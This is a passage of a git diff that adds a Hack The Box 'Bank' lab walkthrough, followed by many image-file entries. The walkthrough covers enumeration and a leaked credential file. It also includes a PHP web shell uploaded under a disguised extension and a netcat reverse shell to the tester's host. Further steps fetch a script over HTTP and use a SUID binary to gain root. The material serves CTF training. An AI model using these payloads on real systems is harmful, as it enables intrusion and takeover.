+ 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
+ | 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
+ | 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
+ |_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
+ 53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
+ | dns-nsid:
+ |_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
+ 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
+ |_http-server-header: Apache/2.4.7 (Ubuntu)
+ | http-title: HTB Bank - Login
+ |_Requested resource was login.php
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 18.18 seconds
+
+
+## **Part 2 : Getting User Access**
+
+First of all we will browse to the Apparent apache 2.4.7 from within our web browser to see if we can find a little more details.
+
+
+
+There is something strange here, our nmap scans told us that we would meet a login.php page The problem is simply that HTB doesn't do DNS so we will need to add 10.10.10.29 to our /etc/hosts file. with the alias **bank.htb**
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist] → nano /etc/hosts
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist] → cat /etc/hosts
+ 10.10.10.29 bank.htb
+ 10.10.10.76 sunday.htb
+ 127.0.0.1 localhost
+ 127.0.1.1 prometheus
+ ::1 localhost ip6-localhost ip6-loopback
+ ff02::1 ip6-allnodes
+ ff02::2 ip6-allrouters
+
+
+Once we browse to the new alias bank.htb , we see that it finally redirects us to the login page **login.php** that our nmap scan picked up.
+
+
+
+To find out which diretories are available for this http service, we run a dirbusting command such as **gobuster**
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist] → gobuster -u http://bank.htb/ -w /usr/share/wordlist
+
+
+Give it some time to run, and looking at the results, we see that the process found the **/balance-transfer/** directory gobuster also found the /uploads/ directory but for now we won't use it, it will be of use later on. We can browse to it from within our web browser, but for this example we will use the lynx command.
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist] → lynx http://bank.htb/balance-transfer/
+
+
+
+
+Here we can see that the page is giving us a bunch of encrypted files that have the exact size of 583 or 584. If we scroll down a bit we will end up seeing that there is one specific file that does not match this 583 size.
+
+
+
+Within lynx we just need to press Enter once the correct hyperlink is selected, and it takes us to an unencrypted account file for the user chris. Revealing his strong password.
+
+
+
+We now have credentials to work with : **chris@bank.htb : !##HTBB4nkP4ssw0rd!##** We will try them onto the login page that our nmap scan picked up before.
+
+
+
+And we are logged in ! we have access to the user christos Christopoulos, the credentials worked on login.php. For our next step we navigate to the php support page that allows us to choose files to submit tickets. We will upload a malicious php file to which we will make sure that the extension ending it is not .php but something else. here we will name it **nihilist.php.htb**
+
+
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bank] → nano nihilist.php.htb
+
+ <****?php echo (system($_GET['go'])); ?>
+
+let's see if we can upload our ticket, therefore uploading our malicious disguised php file.
+
+ 
+
+We have been successful in uploading our ticket containing our malicious nihilist.php.htb file. We can browse to it using our web browser, but for this example we will use the curl command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → curl -vsk "http://bank.htb/uploads/nihilist.php.htb?go=id"
+ * Trying 10.10.10.29:80...
+ * TCP_NODELAY set
+ * Connected to bank.htb (10.10.10.29) port 80 (#0)
+ > GET /uploads/nihilist.php.htb?go=id HTTP/1.1
+ > Host: bank.htb
+ > User-Agent: curl/7.67.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ < HTTP/1.1 200 OK
+ < Date: Thu, 14 Nov 2019 08:27:54 GMT
+ < Server: Apache/2.4.7 (Ubuntu)
+ < X-Powered-By: PHP/5.5.9-1ubuntu4.21
+ < Vary: Accept-Encoding
+ < Content-Length: 107
+ < Content-Type: text/html
+ <
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ * Connection #0 to host bank.htb left intact
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+
+we see that the malicious php file we uploaded gave us access to the system, we will now use the malicious php file to send us a reverse shell to our second terminal.
+
+We will browse to our malicious php file within our terminal using the curl syntax we used before, and tell it to connect back to us on port 6969. One important thing to note though is that we cannot leave the URL as displayed below.
+
+
+ http://bank.htb/uploads/nihilist.php.htb?go=nc -e /bin/sh 10.10.14.48 6969
+
+
+We need to replace the **spaces** with their equivalent **%20**
+
+
+ http://bank.htb/uploads/nihilist.php.htb?go=nc**%20** -e**%20** /bin/sh**%20** 10.10.14.48**%20** 6969
+
+
+Now let's test it with our corrected URL
+
+_Terminal 1 :_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nc -lvnp 6969
+
+
+_Terminal 2 :_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → curl -vsk "http://bank.htb/uploads/nihilist.php.htb?go=nc%20-e%20/bin/sh%2010.10.14.48%206969"
+ * Trying 10.10.10.29:80...
+ * TCP_NODELAY set
+ * Connected to bank.htb (10.10.10.29) port 80 (#0)
+ > GET /uploads/nihilist.php.htb?go=nc%20-e%20/bin/sh%2010.10.14.48%206969 HTTP/1.1
+ > Host: bank.htb
+ > User-Agent: curl/7.67.0
+ > Accept: */*
+ >
+
+
+_Terminal 1 :_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nc -lvnp 6969
+ Connection from 10.10.10.29:52558
+
+ uname -a
+ Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
+
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+ cat /home/chris/user.txt
+ 37XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+## **Part 3 : Getting Root Access**
+
+Now that we have user access, we need to escalate privileges on this box. For that matter we will first upload linenum.sh on the box using python3's http server module.
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → cd _HTB/Bank
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bank] → ls
+ 68576f20e9732f1b2edc4df5b8533230.acc
+ nihilist.php.htb
+ linenum.sh
+ node_modules
+ package-lock.json
+ progress.graphml
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bank] → python3 -m http.server 8000
+ Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
+ 10.10.10.29 - - [14/Nov/2019 09:55:51] "GET /linenum.sh HTTP/1.1" 200 -
+
+
+
+
+_Terminal 2:_
+
+
+ which wget
+ /usr/bin/wget
+
+ wget 10.10.14.48:8000/linenum.sh
+ ./linenum.sh > output.txt
+
+ python -c 'import pty; pty.spawn("/bin/bash")'
+ www-data@bank:/var/www/bank/uploads$ id
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ www-data@bank:/var/www/bank/uploads$
+
+
+Now we have a semi-interactive shell Let's navigate to /var/htb/bin to run the binary called **emergency**
+
+
+ www-data@bank:/var/www/bank/uploads$ cd /var/htb/bin
+ cd /var/htb/bin
+
+ www-data@bank:/var/htb/bin$ ls
+ ls
+ emergency
+
+ www-data@bank:/var/htb/bin$ ls -l
+ ls -l
+ total 112
+ -rwsr-xr-x 1 root root 112204 Jun 14 2017 emergency
+
+ www-data@bank:/var/htb/bin$ ./emergency
+ ./emergency
+
+ # id
+ id
+ uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
+
+ # cat /root/root.txt
+ cat /root/root.txt
+ d5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+Executing the aforementioned binary gave us an elevation of privileges, and we have been able to read the root.txt
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/img/0.png b/Easy/img/0.png
new file mode 100644
index 0000000..b25d934
Binary files /dev/null and b/Easy/img/0.png differ
diff --git a/Easy/img/10.png b/Easy/img/10.png
new file mode 100644
index 0000000..fda63ed
Binary files /dev/null and b/Easy/img/10.png differ
diff --git a/Easy/img/10_graph.png b/Easy/img/10_graph.png
new file mode 100644
index 0000000..87476c2
Binary files /dev/null and b/Easy/img/10_graph.png differ
diff --git a/Easy/img/11.png b/Easy/img/11.png
new file mode 100644
index 0000000..daa48e9
Binary files /dev/null and b/Easy/img/11.png differ
diff --git a/Easy/img/11_graph.png b/Easy/img/11_graph.png
new file mode 100644
index 0000000..9e4e0f2
Binary files /dev/null and b/Easy/img/11_graph.png differ
diff --git a/Easy/img/12.png b/Easy/img/12.png
new file mode 100644
index 0000000..5c57332
Binary files /dev/null and b/Easy/img/12.png differ
diff --git a/Easy/img/12_graph.png b/Easy/img/12_graph.png
new file mode 100644
index 0000000..12f8260
Binary files /dev/null and b/Easy/img/12_graph.png differ
diff --git a/Easy/img/13.png b/Easy/img/13.png
new file mode 100644
index 0000000..8ba8754
Binary files /dev/null and b/Easy/img/13.png differ
diff --git a/Easy/img/13_graph.png b/Easy/img/13_graph.png
new file mode 100644
index 0000000..0eab972
Binary files /dev/null and b/Easy/img/13_graph.png differ
diff --git a/Easy/img/14.png b/Easy/img/14.png
new file mode 100644
index 0000000..9b14d29
Binary files /dev/null and b/Easy/img/14.png differ
diff --git a/Easy/img/14_graph.png b/Easy/img/14_graph.png
new file mode 100644
index 0000000..02e20f0
Binary files /dev/null and b/Easy/img/14_graph.png differ
diff --git a/Easy/img/15.png b/Easy/img/15.png
new file mode 100644
index 0000000..231146b
Binary files /dev/null and b/Easy/img/15.png differ
diff --git a/Easy/img/15_graph.png b/Easy/img/15_graph.png
new file mode 100644
index 0000000..64c7869
Binary files /dev/null and b/Easy/img/15_graph.png differ
diff --git a/Easy/img/16.png b/Easy/img/16.png
new file mode 100644
index 0000000..5ac3e07
Binary files /dev/null and b/Easy/img/16.png differ
diff --git a/Easy/img/16_graph.png b/Easy/img/16_graph.png
new file mode 100644
index 0000000..77ae6c7
Binary files /dev/null and b/Easy/img/16_graph.png differ
diff --git a/Easy/img/17.png b/Easy/img/17.png
new file mode 100644
index 0000000..4b9df76
Binary files /dev/null and b/Easy/img/17.png differ
diff --git a/Easy/img/17_graph.png b/Easy/img/17_graph.png
new file mode 100644
index 0000000..9ff5e57
Binary files /dev/null and b/Easy/img/17_graph.png differ
diff --git a/Easy/img/18.png b/Easy/img/18.png
new file mode 100644
index 0000000..6febb7f
Binary files /dev/null and b/Easy/img/18.png differ
diff --git a/Easy/img/18_graph.png b/Easy/img/18_graph.png
new file mode 100644
index 0000000..e9d41bd
Binary files /dev/null and b/Easy/img/18_graph.png differ
diff --git a/Easy/img/19.png b/Easy/img/19.png
new file mode 100644
index 0000000..3c28cd4
Binary files /dev/null and b/Easy/img/19.png differ
diff --git a/Easy/img/19_graph.png b/Easy/img/19_graph.png
new file mode 100644
index 0000000..b07e6cc
Binary files /dev/null and b/Easy/img/19_graph.png differ
diff --git a/Easy/img/1_graph.png b/Easy/img/1_graph.png
new file mode 100644
index 0000000..e95c774
Binary files /dev/null and b/Easy/img/1_graph.png differ
diff --git a/Easy/img/2.png b/Easy/img/2.png
new file mode 100644
index 0000000..2561396
Binary files /dev/null and b/Easy/img/2.png differ
diff --git a/Easy/img/20.png b/Easy/img/20.png
new file mode 100644
index 0000000..43c1ada
Binary files /dev/null and b/Easy/img/20.png differ
diff --git a/Easy/img/20_graph.png b/Easy/img/20_graph.png
new file mode 100644
index 0000000..6e6f511
Binary files /dev/null and b/Easy/img/20_graph.png differ
diff --git a/Easy/img/21.png b/Easy/img/21.png
new file mode 100644
index 0000000..5f13b0c
Binary files /dev/null and b/Easy/img/21.png differ
diff --git a/Easy/img/21_graph.png b/Easy/img/21_graph.png
new file mode 100644
index 0000000..46c11fb
Binary files /dev/null and b/Easy/img/21_graph.png differ
diff --git a/Easy/img/22.png b/Easy/img/22.png
new file mode 100644
index 0000000..2434dde
Binary files /dev/null and b/Easy/img/22.png differ
diff --git a/Easy/img/22_graph.png b/Easy/img/22_graph.png
new file mode 100644
index 0000000..ad5723a
Binary files /dev/null and b/Easy/img/22_graph.png differ
diff --git a/Easy/img/23.png b/Easy/img/23.png
new file mode 100644
index 0000000..f4f5f0f
Binary files /dev/null and b/Easy/img/23.png differ
diff --git a/Easy/img/23_graph.png b/Easy/img/23_graph.png
new file mode 100644
index 0000000..d734929
Binary files /dev/null and b/Easy/img/23_graph.png differ
diff --git a/Easy/img/24.png b/Easy/img/24.png
new file mode 100644
index 0000000..14cd97b
Binary files /dev/null and b/Easy/img/24.png differ
diff --git a/Easy/img/24_graph.png b/Easy/img/24_graph.png
new file mode 100644
index 0000000..887ea9d
Binary files /dev/null and b/Easy/img/24_graph.png differ
diff --git a/Easy/img/25.png b/Easy/img/25.png
new file mode 100644
index 0000000..3b6f21c
Binary files /dev/null and b/Easy/img/25.png differ
diff --git a/Easy/img/25_graph.png b/Easy/img/25_graph.png
new file mode 100644
index 0000000..0719ced
Binary files /dev/null and b/Easy/img/25_graph.png differ
diff --git a/Easy/img/26.png b/Easy/img/26.png
new file mode 100644
index 0000000..c2e7fce
Binary files /dev/null and b/Easy/img/26.png differ
diff --git a/Easy/img/26_graph.png b/Easy/img/26_graph.png
new file mode 100644
index 0000000..e9af1e0
Binary files /dev/null and b/Easy/img/26_graph.png differ
diff --git a/Easy/img/27.png b/Easy/img/27.png
new file mode 100644
index 0000000..b68dc34
Binary files /dev/null and b/Easy/img/27.png differ
diff --git a/Easy/img/27_graph.png b/Easy/img/27_graph.png
new file mode 100644
index 0000000..ad7c18b
Binary files /dev/null and b/Easy/img/27_graph.png differ
diff --git a/Easy/img/28.png b/Easy/img/28.png
new file mode 100644
index 0000000..e317357
Binary files /dev/null and b/Easy/img/28.png differ
diff --git a/Easy/img/28_graph.png b/Easy/img/28_graph.png
new file mode 100644
index 0000000..c35a4ea
Binary files /dev/null and b/Easy/img/28_graph.png differ
diff --git a/Easy/img/29.png b/Easy/img/29.png
new file mode 100644
index 0000000..1c7a807
Binary files /dev/null and b/Easy/img/29.png differ
diff --git a/Easy/img/29_graph.png b/Easy/img/29_graph.png
new file mode 100644
index 0000000..2bc211e
Binary files /dev/null and b/Easy/img/29_graph.png differ
diff --git a/Easy/img/2_graph.png b/Easy/img/2_graph.png
new file mode 100644
index 0000000..c0fa1c2
Binary files /dev/null and b/Easy/img/2_graph.png differ
diff --git a/Easy/img/3.png b/Easy/img/3.png
new file mode 100644
index 0000000..c0e994b
Binary files /dev/null and b/Easy/img/3.png differ
diff --git a/Easy/img/30.png b/Easy/img/30.png
new file mode 100644
index 0000000..b18bb9b
Binary files /dev/null and b/Easy/img/30.png differ
diff --git a/Easy/img/30_graph.png b/Easy/img/30_graph.png
new file mode 100644
index 0000000..2136d77
Binary files /dev/null and b/Easy/img/30_graph.png differ
diff --git a/Easy/img/31.png b/Easy/img/31.png
new file mode 100644
index 0000000..0fc9a7f
Binary files /dev/null and b/Easy/img/31.png differ
diff --git a/Easy/img/31_graph.png b/Easy/img/31_graph.png
new file mode 100644
index 0000000..f359007
Binary files /dev/null and b/Easy/img/31_graph.png differ
diff --git a/Easy/img/32.png b/Easy/img/32.png
new file mode 100644
index 0000000..578c81c
Binary files /dev/null and b/Easy/img/32.png differ
diff --git a/Easy/img/32_graph.png b/Easy/img/32_graph.png
new file mode 100644
index 0000000..4e5c137
Binary files /dev/null and b/Easy/img/32_graph.png differ
diff --git a/Easy/img/33.png b/Easy/img/33.png
new file mode 100644
index 0000000..62aaa56
Binary files /dev/null and b/Easy/img/33.png differ
diff --git a/Easy/img/33_graph.png b/Easy/img/33_graph.png
new file mode 100644
index 0000000..7bcedd4
Binary files /dev/null and b/Easy/img/33_graph.png differ
diff --git a/Easy/img/34.png b/Easy/img/34.png
new file mode 100644
index 0000000..f5286cb
Binary files /dev/null and b/Easy/img/34.png differ
diff --git a/Easy/img/34_graph.png b/Easy/img/34_graph.png
new file mode 100644
index 0000000..a6b3820
Binary files /dev/null and b/Easy/img/34_graph.png differ
diff --git a/Easy/img/35.png b/Easy/img/35.png
new file mode 100644
index 0000000..44e0a1e
Binary files /dev/null and b/Easy/img/35.png differ
diff --git a/Easy/img/35_graph.png b/Easy/img/35_graph.png
new file mode 100644
index 0000000..da302fd
Binary files /dev/null and b/Easy/img/35_graph.png differ
diff --git a/Easy/img/36.png b/Easy/img/36.png
new file mode 100644
index 0000000..26fd8a1
Binary files /dev/null and b/Easy/img/36.png differ
diff --git a/Easy/img/36_graph.png b/Easy/img/36_graph.png
new file mode 100644
index 0000000..b8effa7
Binary files /dev/null and b/Easy/img/36_graph.png differ
diff --git a/Easy/img/37.png b/Easy/img/37.png
new file mode 100644
index 0000000..f2227da
Binary files /dev/null and b/Easy/img/37.png differ
diff --git a/Easy/img/37_graph.png b/Easy/img/37_graph.png
new file mode 100644
index 0000000..fcefc11
Binary files /dev/null and b/Easy/img/37_graph.png differ
diff --git a/Easy/img/38.png b/Easy/img/38.png
new file mode 100644
index 0000000..824c02b
Binary files /dev/null and b/Easy/img/38.png differ
diff --git a/Easy/img/38_graph.png b/Easy/img/38_graph.png
new file mode 100644
index 0000000..f359b6a
Binary files /dev/null and b/Easy/img/38_graph.png differ
diff --git a/Easy/img/39.png b/Easy/img/39.png
new file mode 100644
index 0000000..d9709c4
Binary files /dev/null and b/Easy/img/39.png differ
diff --git a/Easy/img/39_graph.png b/Easy/img/39_graph.png
new file mode 100644
index 0000000..dc3bd30
Binary files /dev/null and b/Easy/img/39_graph.png differ
diff --git a/Easy/img/3_graph.png b/Easy/img/3_graph.png
new file mode 100644
index 0000000..c2538a2
Binary files /dev/null and b/Easy/img/3_graph.png differ
diff --git a/Easy/img/4.png b/Easy/img/4.png
new file mode 100644
index 0000000..5872eaa
Binary files /dev/null and b/Easy/img/4.png differ
diff --git a/Easy/img/40.png b/Easy/img/40.png
new file mode 100644
index 0000000..c0654ed
Binary files /dev/null and b/Easy/img/40.png differ
diff --git a/Easy/img/40_graph.png b/Easy/img/40_graph.png
new file mode 100644
index 0000000..4c2883c
Binary files /dev/null and b/Easy/img/40_graph.png differ
diff --git a/Easy/img/41.png b/Easy/img/41.png
new file mode 100644
index 0000000..1befcb0
Binary files /dev/null and b/Easy/img/41.png differ
diff --git a/Easy/img/41_graph.png b/Easy/img/41_graph.png
new file mode 100644
index 0000000..c5864e3
Binary files /dev/null and b/Easy/img/41_graph.png differ
diff --git a/Easy/img/42.png b/Easy/img/42.png
new file mode 100644
index 0000000..e40b8c6
Binary files /dev/null and b/Easy/img/42.png differ
diff --git a/Easy/img/42_graph.png b/Easy/img/42_graph.png
new file mode 100644
index 0000000..dea2adf
Binary files /dev/null and b/Easy/img/42_graph.png differ
diff --git a/Easy/img/43.png b/Easy/img/43.png
new file mode 100644
index 0000000..add99b8
Binary files /dev/null and b/Easy/img/43.png differ
diff --git a/Easy/img/43_graph.png b/Easy/img/43_graph.png
new file mode 100644
index 0000000..1b9fc53
Binary files /dev/null and b/Easy/img/43_graph.png differ
diff --git a/Easy/img/44.png b/Easy/img/44.png
new file mode 100644
index 0000000..6694554
Binary files /dev/null and b/Easy/img/44.png differ
diff --git a/Easy/img/44_graph.png b/Easy/img/44_graph.png
new file mode 100644
index 0000000..5f58140
Binary files /dev/null and b/Easy/img/44_graph.png differ
diff --git a/Easy/img/45.png b/Easy/img/45.png
new file mode 100644
index 0000000..847a36c
Binary files /dev/null and b/Easy/img/45.png differ
diff --git a/Easy/img/45_graph.png b/Easy/img/45_graph.png
new file mode 100644
index 0000000..08c3fef
Binary files /dev/null and b/Easy/img/45_graph.png differ
diff --git a/Easy/img/46.png b/Easy/img/46.png
new file mode 100644
index 0000000..6d41bcf
Binary files /dev/null and b/Easy/img/46.png differ
diff --git a/Easy/img/46_graph.png b/Easy/img/46_graph.png
new file mode 100644
index 0000000..d9c056e
Binary files /dev/null and b/Easy/img/46_graph.png differ
diff --git a/Easy/img/47.png b/Easy/img/47.png
new file mode 100644
index 0000000..b30a033
Binary files /dev/null and b/Easy/img/47.png differ
diff --git a/Easy/img/47_graph.png b/Easy/img/47_graph.png
new file mode 100644
index 0000000..c429b7f
Binary files /dev/null and b/Easy/img/47_graph.png differ
diff --git a/Easy/img/48.png b/Easy/img/48.png
new file mode 100644
index 0000000..1b83e0e
Binary files /dev/null and b/Easy/img/48.png differ
diff --git a/Easy/img/48_graph.png b/Easy/img/48_graph.png
new file mode 100644
index 0000000..635ada7
Binary files /dev/null and b/Easy/img/48_graph.png differ
diff --git a/Easy/img/49.png b/Easy/img/49.png
new file mode 100644
index 0000000..b7a38fe
Binary files /dev/null and b/Easy/img/49.png differ
diff --git a/Easy/img/49_graph.png b/Easy/img/49_graph.png
new file mode 100644
index 0000000..d347eb7
Binary files /dev/null and b/Easy/img/49_graph.png differ
diff --git a/Easy/img/4_graph.png b/Easy/img/4_graph.png
new file mode 100644
index 0000000..07e52e9
Binary files /dev/null and b/Easy/img/4_graph.png differ
diff --git a/Easy/img/5.png b/Easy/img/5.png
new file mode 100644
index 0000000..ec00e28
Binary files /dev/null and b/Easy/img/5.png differ
diff --git a/Easy/img/50.png b/Easy/img/50.png
new file mode 100644
index 0000000..7841b46
Binary files /dev/null and b/Easy/img/50.png differ
diff --git a/Easy/img/50_graph.png b/Easy/img/50_graph.png
new file mode 100644
index 0000000..b1df24f
Binary files /dev/null and b/Easy/img/50_graph.png differ
diff --git a/Easy/img/51.png b/Easy/img/51.png
new file mode 100644
index 0000000..e5f9dc8
Binary files /dev/null and b/Easy/img/51.png differ
diff --git a/Easy/img/51_graph.png b/Easy/img/51_graph.png
new file mode 100644
index 0000000..852c8e4
Binary files /dev/null and b/Easy/img/51_graph.png differ
diff --git a/Easy/img/52.png b/Easy/img/52.png
new file mode 100644
index 0000000..d61aaf3
Binary files /dev/null and b/Easy/img/52.png differ
diff --git a/Easy/img/52_graph.png b/Easy/img/52_graph.png
new file mode 100644
index 0000000..06fc036
Binary files /dev/null and b/Easy/img/52_graph.png differ
diff --git a/Easy/img/53.png b/Easy/img/53.png
new file mode 100644
index 0000000..60783eb
Binary files /dev/null and b/Easy/img/53.png differ
diff --git a/Easy/img/53_graph.png b/Easy/img/53_graph.png
new file mode 100644
index 0000000..9714ae8
Binary files /dev/null and b/Easy/img/53_graph.png differ
diff --git a/Easy/img/54.png b/Easy/img/54.png
new file mode 100644
index 0000000..2807752
Binary files /dev/null and b/Easy/img/54.png differ
diff --git a/Easy/img/54_graph.png b/Easy/img/54_graph.png
new file mode 100644
index 0000000..190e3dd
Binary files /dev/null and b/Easy/img/54_graph.png differ
diff --git a/Easy/img/55.png b/Easy/img/55.png
new file mode 100644
index 0000000..30879df
Binary files /dev/null and b/Easy/img/55.png differ
diff --git a/Easy/img/55_graph.png b/Easy/img/55_graph.png
new file mode 100644
index 0000000..a166bea
Binary files /dev/null and b/Easy/img/55_graph.png differ
diff --git a/Easy/img/56.png b/Easy/img/56.png
new file mode 100644
index 0000000..96106d8
Binary files /dev/null and b/Easy/img/56.png differ
diff --git a/Easy/img/56_graph.png b/Easy/img/56_graph.png
new file mode 100644
index 0000000..b1dc4b6
Binary files /dev/null and b/Easy/img/56_graph.png differ
diff --git a/Easy/img/57.png b/Easy/img/57.png
new file mode 100644
index 0000000..3163655
Binary files /dev/null and b/Easy/img/57.png differ
diff --git a/Easy/img/57_graph.png b/Easy/img/57_graph.png
new file mode 100644
index 0000000..c58e26e
Binary files /dev/null and b/Easy/img/57_graph.png differ
diff --git a/Easy/img/58.png b/Easy/img/58.png
new file mode 100644
index 0000000..fd25d27
Binary files /dev/null and b/Easy/img/58.png differ
diff --git a/Easy/img/58_graph.png b/Easy/img/58_graph.png
new file mode 100644
index 0000000..a77f52c
Binary files /dev/null and b/Easy/img/58_graph.png differ
diff --git a/Easy/img/59.png b/Easy/img/59.png
new file mode 100644
index 0000000..3cc9d9f
Binary files /dev/null and b/Easy/img/59.png differ
diff --git a/Easy/img/59_graph.png b/Easy/img/59_graph.png
new file mode 100644
index 0000000..6e19d65
Binary files /dev/null and b/Easy/img/59_graph.png differ
diff --git a/Easy/img/5_graph.png b/Easy/img/5_graph.png
new file mode 100644
index 0000000..7356e67
Binary files /dev/null and b/Easy/img/5_graph.png differ
diff --git a/Easy/img/6.png b/Easy/img/6.png
new file mode 100644
index 0000000..f5a5026
Binary files /dev/null and b/Easy/img/6.png differ
diff --git a/Easy/img/60.png b/Easy/img/60.png
new file mode 100644
index 0000000..136451b
Binary files /dev/null and b/Easy/img/60.png differ
diff --git a/Easy/img/60_graph.png b/Easy/img/60_graph.png
new file mode 100644
index 0000000..82a0215
Binary files /dev/null and b/Easy/img/60_graph.png differ
diff --git a/Easy/img/61.png b/Easy/img/61.png
new file mode 100644
index 0000000..e8a09d8
Binary files /dev/null and b/Easy/img/61.png differ
diff --git a/Easy/img/61_graph.png b/Easy/img/61_graph.png
new file mode 100644
index 0000000..90468de
Binary files /dev/null and b/Easy/img/61_graph.png differ
diff --git a/Easy/img/62.png b/Easy/img/62.png
new file mode 100644
index 0000000..112aa05
Binary files /dev/null and b/Easy/img/62.png differ
diff --git a/Easy/img/62_graph.png b/Easy/img/62_graph.png
new file mode 100644
index 0000000..f3eafbf
Binary files /dev/null and b/Easy/img/62_graph.png differ
diff --git a/Easy/img/63.png b/Easy/img/63.png
new file mode 100644
index 0000000..bb345dd
Binary files /dev/null and b/Easy/img/63.png differ
diff --git a/Easy/img/63_graph.png b/Easy/img/63_graph.png
new file mode 100644
index 0000000..661da02
Binary files /dev/null and b/Easy/img/63_graph.png differ
diff --git a/Easy/img/64.png b/Easy/img/64.png
new file mode 100644
index 0000000..f081301
Binary files /dev/null and b/Easy/img/64.png differ
diff --git a/Easy/img/64_graph.png b/Easy/img/64_graph.png
new file mode 100644
index 0000000..daf354f
Binary files /dev/null and b/Easy/img/64_graph.png differ
diff --git a/Easy/img/65.png b/Easy/img/65.png
new file mode 100644
index 0000000..8d12c97
Binary files /dev/null and b/Easy/img/65.png differ
diff --git a/Easy/img/65_graph.png b/Easy/img/65_graph.png
new file mode 100644
index 0000000..9bc406e
Binary files /dev/null and b/Easy/img/65_graph.png differ
diff --git a/Easy/img/66.png b/Easy/img/66.png
new file mode 100644
index 0000000..2f93342
Binary files /dev/null and b/Easy/img/66.png differ
diff --git a/Easy/img/66_graph.png b/Easy/img/66_graph.png
new file mode 100644
index 0000000..38168c2
Binary files /dev/null and b/Easy/img/66_graph.png differ
diff --git a/Easy/img/67.png b/Easy/img/67.png
new file mode 100644
index 0000000..1383e56
Binary files /dev/null and b/Easy/img/67.png differ
diff --git a/Easy/img/67_graph.png b/Easy/img/67_graph.png
new file mode 100644
index 0000000..186fe9b
Binary files /dev/null and b/Easy/img/67_graph.png differ
diff --git a/Easy/img/68.png b/Easy/img/68.png
new file mode 100644
index 0000000..89c737d
Binary files /dev/null and b/Easy/img/68.png differ
diff --git a/Easy/img/68_graph.png b/Easy/img/68_graph.png
new file mode 100644
index 0000000..71f5c6e
Binary files /dev/null and b/Easy/img/68_graph.png differ
diff --git a/Easy/img/69.png b/Easy/img/69.png
new file mode 100644
index 0000000..69a698b
Binary files /dev/null and b/Easy/img/69.png differ
diff --git a/Easy/img/69_graph.png b/Easy/img/69_graph.png
new file mode 100644
index 0000000..8ce227a
Binary files /dev/null and b/Easy/img/69_graph.png differ
diff --git a/Easy/img/6_graph.png b/Easy/img/6_graph.png
new file mode 100644
index 0000000..2be2c4c
Binary files /dev/null and b/Easy/img/6_graph.png differ
diff --git a/Easy/img/7.png b/Easy/img/7.png
new file mode 100644
index 0000000..d875272
Binary files /dev/null and b/Easy/img/7.png differ
diff --git a/Easy/img/70.png b/Easy/img/70.png
new file mode 100644
index 0000000..fe4ed58
Binary files /dev/null and b/Easy/img/70.png differ
diff --git a/Easy/img/70_graph.png b/Easy/img/70_graph.png
new file mode 100644
index 0000000..6e383ad
Binary files /dev/null and b/Easy/img/70_graph.png differ
diff --git a/Easy/img/71.png b/Easy/img/71.png
new file mode 100644
index 0000000..9451061
Binary files /dev/null and b/Easy/img/71.png differ
diff --git a/Easy/img/7_graph.png b/Easy/img/7_graph.png
new file mode 100644
index 0000000..e7bcc94
Binary files /dev/null and b/Easy/img/7_graph.png differ
diff --git a/Easy/img/8.png b/Easy/img/8.png
new file mode 100644
index 0000000..6982855
Binary files /dev/null and b/Easy/img/8.png differ
diff --git a/Easy/img/8_graph.png b/Easy/img/8_graph.png
new file mode 100644
index 0000000..d22dc4c
Binary files /dev/null and b/Easy/img/8_graph.png differ
diff --git a/Easy/img/9.png b/Easy/img/9.png
new file mode 100644
index 0000000..33ea8a2
Binary files /dev/null and b/Easy/img/9.png differ
diff --git a/Easy/img/9_graph.png b/Easy/img/9_graph.png
new file mode 100644
index 0000000..01a83dc
Binary files /dev/null and b/Easy/img/9_graph.png differ
diff --git a/Easy/img/END.png b/Easy/img/END.png
new file mode 100644
index 0000000..f90a9f7
Binary files /dev/null and b/Easy/img/END.png differ
diff --git a/Easy/prg/10_001.png b/Easy/prg/10_001.png
new file mode 100644
index 0000000..226ae6b
Binary files /dev/null and b/Easy/prg/10_001.png differ
diff --git a/Easy/prg/14_001.png b/Easy/prg/14_001.png
new file mode 100644
index 0000000..9248a48
Binary files /dev/null and b/Easy/prg/14_001.png differ
diff --git a/Easy/prg/14_002.png b/Easy/prg/14_002.png
new file mode 100644
index 0000000..aab6b20
